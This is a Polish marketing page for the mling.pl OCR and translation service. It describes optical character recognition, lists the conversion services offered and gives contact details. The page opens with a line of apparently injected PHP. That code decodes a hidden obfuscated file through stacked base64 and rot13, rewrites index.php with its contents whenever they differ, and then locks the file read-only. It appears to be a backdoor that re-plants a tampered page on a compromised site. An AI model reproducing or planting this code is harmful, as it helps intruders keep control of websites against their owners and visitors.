$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } OCR: angielski, niemiecki, francuski | mling.pl
698 688 787 lub 22 379 04 55 biuro@mling.pl
Zaznacz stronę

OCR

Wykonanie OCR

Wycena tłumaczenia

wyc

 • Całkowicie za darmo !
 • Prześlij pliki
 • Odpowiedź do 30 minut
Sprawdź

Firma Wiarygodna Finansowo

fwf


Co to jest OCR dokumentów?

Z angielskiego Optical Character Recognition, czyli Optyczne Rozpoznawanie Znaków.

Dzięki tej operacji użytkownik komputera może dokument papierowy lub książkę (także skan z pliku JPG czy PDF) zamienić na dokument komputerowy w celu jego dalszej edycji (dokonywania zmian w Wordzie). Co przede wszystkim zyskuje? Nie traci czasu i nie ponosi kosztów przepisywania dokumentu, pracy, książki itp.

OCR pozwala na zachowanie kroju czcionki, układu akapitów, zachowanie ilustracji i wykresów.
Jakość OCR zależy od jakości materiału źródłowego, który jest przetwarzany.

OCR przeprowadzany jest co najmniej dwuetapowo:

 • OCR automatyczny, gdzie o rozpoznaniu poszczególnych elementów decyduje komputer (a nie człowiek)
 • ‚ręczna’ korekta – poprawa przez człowieka znalezionych błędów i jak najlepsze dopasowanie formatowania w Wordzie (lub innym edytorze) do oryginału.

Oto co możemy zaoferować

 • Zamiana tekstu maszynowego (maszynopisu) lub drukowanego na pliki komputerowe Word
 • Zamiana maszynopisu na elektroniczny tekst komputerowy
 • Zamiana tekstu z plików graficznych (JPG, TIFF i innych) na tekst komputerowy do edycji w Wordzie
 • Zamiana dokumentów papierowych na cyfrowe do edycji
 • Skanowanie dokumentów do formatu Worda
 • Przetwarzanie tekstu zeskanowanego do Worda
 • Przetwarzanie plików graficznych (z tabelami, zdjęciami i tekstami) do Worda
 • Skanowanie dokumentów papierowych, OCR dokumentów
 • Rozpoznawanie tekstów OCR (tekst maszynowy lub drukowany).
 • Edycja zeskanowanych tekstów i tabel
 • Przygotowanie publikacji elektronicznych w plikach PDF (wielostronicowych) – z zakładkami lub spisem treści odsyłającym do danego rozdziału

Najczęściej tłumaczone języki to:

 • angielski
 • niemiecki
 • francuski
UWAGA !!! Każdy klient biura tłumaczeń mling.pl, wykonanie OCR otrzymuje całkowicie GRATIS!